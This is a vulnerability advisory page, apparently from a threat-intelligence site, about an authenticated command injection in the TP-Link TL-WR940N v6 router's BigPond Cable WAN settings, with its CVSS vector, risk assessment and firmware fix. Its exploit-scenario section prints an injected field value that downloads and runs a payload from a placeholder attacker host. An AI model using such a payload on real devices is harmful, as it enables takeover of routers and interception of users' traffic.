Severity by source
CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Adjacent web-UI access (AV:A), low complexity once authenticated (AC:L), requires admin credentials (PR:H), no user interaction, and injected commands fully compromise the router OS (C/I/A:H).
Primary rating from Vendor (TPLink).
CVSS VectorVendor: TPLink
CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
1DescriptionCVE.org
An authenticated OS command injection vulnerability exists in the BigPond Cable (BPA) WAN configuration module in TL-WR940N v6 due to improper sanitization of user input. An attacker with administrative access may exploit this issue to execute arbitrary system commands with elevated privileges.
AnalysisAI
Authenticated OS command injection in the TP-Link TL-WR940N v6 router's BigPond Cable (BPA) WAN configuration module allows administrators to execute arbitrary system commands with elevated privileges on the device. The flaw stems from improper sanitization of user-supplied input in the WAN setup path and affects firmware versions prior to V6_260528. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires (1) network adjacency to the router - specifically reach to its HTTP/HTTPS administration interface, which by default is only exposed on LAN/Wi-Fi (AV:A in the CVSS 4.0 vector), (2) valid administrative credentials for the web UI (PR:H), and (3) the attacker must reach and submit the BigPond Cable (BPA) WAN connection-type configuration form, since the injection lives in that specific WAN module's input handling. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | This is a moderate-priority issue rather than an emergency: the CVSS 4.0 vector (AV:A/AC:L/AT:N/PR:H/UI:N) limits exploitation to an attacker already on the adjacent network with high-privilege administrative credentials, which substantially constrains the realistic attacker pool. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker who has obtained the router's admin password (via phishing, default-credential reuse, a prior CSRF, or a compromised LAN host) reaches the web UI from the LAN or Wi-Fi, navigates to the WAN configuration page, selects BigPond Cable as the connection type, and submits a crafted BPA parameter containing shell metacharacters (for example, a server or username field with `; wget http://attacker/x -O /tmp/x; sh /tmp/x #`). The injected command runs with the httpd process's elevated privileges, giving the attacker a persistent root-equivalent foothold on the router that can be used for DNS hijacking, traffic interception, or pivoting into the internal network. … |
| Remediation | Vendor-released patch: TL-WR940N v6 firmware build V6_260528 - apply this firmware (or any later release) from https://www.tp-link.com/en/support/download/tl-wr940n/v6/#Firmware or https://www.tp-link.com/us/support/download/tl-wr940n/v6/#Firmware, following the FAQ at https://www.tp-link.com/us/support/faq/5131/. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Query network inventory for TP-Link TL-WR940N v6 devices and document current firmware versions. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
More in Tl Wr940N V6
View allSame weakness CWE-78 – OS Command Injection
View allSame technique Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-37498